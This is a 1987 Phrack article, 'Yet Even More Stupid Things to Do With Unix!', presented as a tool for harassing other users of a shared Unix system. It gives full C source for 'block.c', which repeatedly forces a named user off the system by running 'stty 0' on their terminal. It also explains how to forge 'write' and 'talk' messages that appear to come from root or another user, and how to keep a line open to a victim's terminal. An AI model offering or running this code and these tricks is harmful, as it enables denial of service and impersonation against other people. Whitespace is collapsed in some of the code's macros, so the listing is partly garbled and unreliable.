264 lines
9.5 KiB
Plaintext
264 lines
9.5 KiB
Plaintext
===== Phrack Magazine presents Phrack 15 =====
|
|
|
|
===== File 2 of 8 =====
|
|
|
|
I thought I had written everything there is to write about the Unix operating
|
|
system until I was recently asked to put out yet another file... so I said
|
|
"I'll try, but don't publish my file along with an article by The Radical
|
|
Rocker this time!" These demands having been met, I booted up the PC and
|
|
threw together...
|
|
|
|
--- ---- ---- ------ ------ -- -- ---- -----
|
|
% Yet Even More Stupid Things to Do With Unix! $
|
|
--- ---- ---- ------ ------ -- -- ---- -----
|
|
|
|
By Shooting Shark.
|
|
Submitted August 26, 1987
|
|
|
|
|
|
These two topics are methods of annoying other users of the system and
|
|
generally being a pest. But would you want to see a file on *constructive*
|
|
things to do with Unix? Didn't think so...
|
|
|
|
|
|
-- ------- ----- --- --- ------
|
|
1. Keeping Users Off The System
|
|
-- ------- ----- --- --- ------
|
|
|
|
Now, we all know by now how to log users off (one way is to redirect an 'stty
|
|
0' command to their tty) but unless you have root privs, this will not work
|
|
when a user has set 'mesg n' and prevented other users from writing to their
|
|
terminal. But even users who have a 'mesg n' command in their .login (or
|
|
.profile or .cshrc) file still have a window of vulnerability, the time
|
|
between login and the locking of their terminal. I designed the following
|
|
program, block.c, to take advantage of this fact.
|
|
|
|
To get this source running on your favorite Unix system, upload it, call it
|
|
'block.c', and type the following at the % or $ prompt:
|
|
|
|
cc -o block block.c
|
|
|
|
once you've compiled it successfully, it is invoked like so:
|
|
|
|
block username [&]
|
|
|
|
The & is optional and recommended - it runs the program in the background,
|
|
thus letting you do other things while it's at work.
|
|
|
|
If the user specified is logged in at present, it immediately logs them out
|
|
(if possible) and waits for them to log in. If they aren't logged in, it
|
|
starts waiting for them. If the user is presently logged in but has their
|
|
messages off, you'll have to wait until they've logged out to start the thing
|
|
going.
|
|
|
|
Block is essentially an endless loop : it keeps checking for the occurrence of
|
|
the username in /etc/utmp. When it finds it, it immediately logs them out and
|
|
continues. If for some reason the logout attempt fails, the program aborts.
|
|
Normally this won't happen - the program is very quick when run unmodified.
|
|
However, to get such performance, it runs in a very tight loop and will eat up
|
|
a lot of CPU time. Notice that near the end of the program there is the line:
|
|
|
|
/*sleep(SLEEP) */
|
|
|
|
the /* and */ are comment delimiters - right now the line is commented out.
|
|
If you remove the comments and re-compile the program, it will then 'go to
|
|
sleep' for the number of seconds defined in SLEEP (default is 5) at the end of
|
|
every loop. This will save the system load but will slightly decrease the
|
|
odds of catching the user during their 'window of vulnerability.'
|
|
|
|
If you have a chance to run this program at a computer lab at a school or
|
|
somewhere similar, run this program on a friend (or an enemy) and watch the
|
|
reaction on their face when they repeatedly try to log in and are logged out
|
|
before they can do *anything*. It is quite humorous. This program is also
|
|
quite nasty and can make you a lot of enemies!
|
|
|
|
caveat #1: note that if you run the program on yourself, you will be logged
|
|
out, the program will continue to run (depending on the shell you're under)
|
|
and you'll have locked yourself out of the system - so don't do this!
|
|
|
|
caveat #2: I wrote this under OSx version 4.0, which is a licensed version of
|
|
Unix which implements 4.3bsd and AT&T sysV. No guarantees that it will work
|
|
on your system.
|
|
|
|
caveat #3: If you run this program in background, don't forget to kill it
|
|
when you're done with it! (when you invoke it with '&', the shell will give
|
|
you a job number, such as '[2] 90125'. If you want to kill it later in the
|
|
same login session, type 'kill %2'. If you log in later and want to kill it,
|
|
type 'kill 90125'. Just read the man page on the kill command if you need any
|
|
help...
|
|
|
|
----- cut here -----
|
|
|
|
/* block.c -- prevent a user from logging in
|
|
* by Shooting Shark
|
|
* usage : block username [&]
|
|
* I suggest you run this in background.
|
|
*/
|
|
|
|
#include <stdio.h>
|
|
#include <utmp.h>
|
|
#include <ctype.h>
|
|
#include <termio.h>
|
|
#include <fcntl.h>
|
|
|
|
#define W_OK2
|
|
#define SLEEP5
|
|
#define UTMP"/etc/utmp"
|
|
#define TTY_PRE "/dev/"
|
|
|
|
main(ac,av)
|
|
int ac;
|
|
char *av[];
|
|
{
|
|
int target, fp, open();
|
|
struct utmpuser;
|
|
struct termio*opts;
|
|
char buf[30], buf2[50];
|
|
|
|
if (ac != 2) {
|
|
printf("usage : %s username\n",av[0]);
|
|
exit(-1);
|
|
}
|
|
|
|
|
|
for (;;) {
|
|
|
|
if ((fp = open(UTMP,0)) == -1) {
|
|
printf("fatal error! cannot open %s.\n",UTMP);
|
|
exit(-1);
|
|
}
|
|
|
|
|
|
while (read(fp, &user, sizeof user) > 0) {
|
|
if (isprint(user.ut_name[0])) {
|
|
if (!(strcmp(user.ut_name,av[1]))) {
|
|
|
|
printf("%s is logging in...",user.ut_name);
|
|
sprintf(buf,"%s%s",TTY_PRE,user.ut_line);
|
|
printf("%s\n",buf);
|
|
if (access(buf,W_OK) == -1) {
|
|
printf("failed - program aborting.\n");
|
|
exit(-1);
|
|
}
|
|
else {
|
|
if ((target = open(buf,O_WRONLY)) != EOF) {
|
|
sprintf(buf2,"stty 0 > %s",buf);
|
|
system(buf2);
|
|
printf("killed.\n");
|
|
sleep(10);
|
|
}
|
|
|
|
} /* else */
|
|
} /* if strcmp */
|
|
} /* if isprint */
|
|
} /* while */
|
|
close(fp);
|
|
|
|
/*sleep(SLEEP); */
|
|
|
|
} /* for */
|
|
|
|
|
|
|
|
|
|
|
|
}
|
|
|
|
----- cut here -----
|
|
|
|
|
|
-- ------------- ----- ----- ---- ------ --- ------
|
|
2. Impersonating other users with 'write' and 'talk'
|
|
-- ------------- ----- ----- ---- ------ --- ------
|
|
|
|
This next trick wasn't exactly a work of stupefying genius, but is a little
|
|
trick (that anybody can do) that I sometimes use to amuse myself and, as with
|
|
the above, annoy the hell out of my friends and enemies.
|
|
|
|
Nearly every Unix system has the 'write' program, for conversing with other
|
|
logged-in users. As a quick summary:
|
|
|
|
If you see that user 'clara' is logged in with the 'who' or 'w' command or
|
|
whatever, and you wish to talk to her for some reason or another, you'd type
|
|
'write clara'. Clara then would see on her screen something like this (given
|
|
that you are username 'shark'):
|
|
|
|
|
|
[3 ^G's] Message from shark on ttyi13 at 23:14 ...
|
|
|
|
You then type away at her, and whatever you type is sent to her terminal
|
|
line-by-line. If she wanted to make it a conversation rather than a
|
|
monologue, she'd type 'write shark,' you'd get a message similar to the above
|
|
on your terminal, and the two of you would type away at each other to your
|
|
little heart's content. If either one of you wanted to end the conversation,
|
|
you would type a ^D. They would then see the characters 'EOF' on their
|
|
screen, but they'd still be 'write'ing to you until they typed a ^D as well.
|
|
|
|
Now, if you're on a bigger installation you'll probably have some sort of
|
|
full-screen windowing chat program like 'talk'. My version of talk sends the
|
|
following message:
|
|
|
|
Message from Talk_Daemon@tibsys at 23:14 ...
|
|
talk: connection requested by shark@tibsys.
|
|
talk: respond with: talk shark@tibsys
|
|
|
|
Anyway, here's where the fun part begins: It's quite easy to put a sample
|
|
'write' or 'talk' message into a file and then edit so that the 'from' is a
|
|
different person, and the tty is listed differently. If you see that your
|
|
dorky friend roger is on ttyi10 and the root also happens to be logged on on
|
|
ttyi01, make the file look something like this:
|
|
|
|
[3 control-G's] Message from root on ttyi01 at [the current time]
|
|
|
|
wackawackawackawackawacka!!!
|
|
|
|
[or a similarly confusing or rude message...]
|
|
|
|
EOF
|
|
|
|
Then, send this file to roger's terminal with:
|
|
|
|
cat filename > /dev/ttyi10
|
|
|
|
He'll get the message on his terminal and wonder what the hell the superuser
|
|
is talking about. He might even 'write' back to the superuser with the intent
|
|
of asking 'what the hell are you talking about?'. For maximum effectiveness,
|
|
*simultaneously* send a message to root 'from' roger at the appropriate
|
|
terminal with an equally strange message - they'll then engage in a
|
|
conversation that will go something like "what did you mean by that?" "what
|
|
do you mean, what do I mean? What did *you* mean by that?" etc. A splendid
|
|
time is guaranteed for all! Note that you don't have to make 'root' the
|
|
perpetrator of the gag, any two currently logged-in users who have their
|
|
terminals open for messages can join in on the fun.
|
|
|
|
Similarly, you can fake a few 'talk' pages from/to two people...they will then
|
|
probably start talking...although the conversation will be along the lines of
|
|
"what do you want?" "you tell me." "you paged me, you tell *me." etcetera,
|
|
while you laugh yourself silly or something like that.
|
|
|
|
A variation on the theme: As I said, when using 'write' you type a ^D to end
|
|
the conversation, and the person you're typing at sees an 'EOF' on their
|
|
screen. But you could also just *type* 'EOF', and they'd think you've
|
|
quit...but you still have an open line to their terminal. Even if they later
|
|
turn messages off, you still have the ability to write to their terminal.
|
|
Keeping this fact in mind, anybody who knows what they're doing can write a
|
|
program similar to my 'block' program above that doesn't log a user out when
|
|
they appear on the system, but opens their tty as a device and keeps the file
|
|
handle in memory so you can redirect to their terminal - to write rude
|
|
messages or to log them out or whatever - at any time, until they log out.
|
|
|
|
As I said, there was no great amount of genius in the above discourse, but
|
|
it's a pastime I enjoy occasionally...
|
|
|
|
-- Shooting Shark
|
|
|
|
|
|
"the first fact to face is that unix was not developed with security, in any
|
|
realistic sense, in mind..."
|
|
|
|
-- Dennis M. Ritchie
|
|
|
|
"Oryan QUEST couldn't hack his way out of a UNIX system, let alone into one."
|
|
|
|
-- Tharrys Ridenow
|